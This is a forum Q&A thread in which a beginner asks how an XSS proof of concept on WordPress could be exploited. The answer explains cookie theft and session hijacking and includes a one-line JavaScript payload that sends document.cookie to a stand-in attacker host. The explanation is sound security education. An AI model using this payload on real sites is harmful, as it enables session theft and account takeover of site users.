# Wordpress XSS vulnerabilty (grabbing PHPSESSID)

Tags: wordpress, security, xss

I just started to study the vulnerability of websites and I've got a doubt about a Wordpress's XSS vulnerability. With this exploit, an attacker can grab the PHPSESSID with a simple Javascript's command:

```
(alert(document.cookie))
```

How can an attacker use this? Is this a serious security problem or not?

Comment: XSS is a very common and serious security threat.  XSS is one of the most basic vulnerabilities, and you have a lot to learn.

Answer (score 1):

An `alert(…)` is just a [proof of concept](http://en.wikipedia.org/wiki/Proof_of_concept) that demonstrates the successful exploitation of the XSS vulnerability. It would not be used in an actual attack as it doesn’t give the attacker any benefit.

In a real attack, the attacker would try to get the value of `document.cookie` somehow. A simple example would be to use JavaScript to forge a simple HTTP request that contains the value of `document.cookie` like this:

```
new Image().src="http://evil.example/?"+document.cookie
```

This creates an image with the attacker’s URL as image source which has the cookie appended to it.

With the victim’s cookie, the attacker may be able to [hijack the victim’s session](http://en.wikipedia.org/wiki/Session_hijacking) and use WordPress with the same privileges as the victim. In case the victim is administrator, the attacker would have access to administrative functions.

Comment: Ok, but how the attacker can use this cookie? He eventually could have a privilege escalation for the Wordpress's site?

Comment: @user2131170 Oh yes, forgot about that. Updated my answer accordingly.

Comment: Uh, ok. I thinked that the attacker, when he grab the PHPSESSID value, he can simple add the cookie in his browser and log into the Wordpress with the same privileges as the victim. Isn't it correct?

Comment: @user2131170 Yes, that’s basically how session hijacking is working.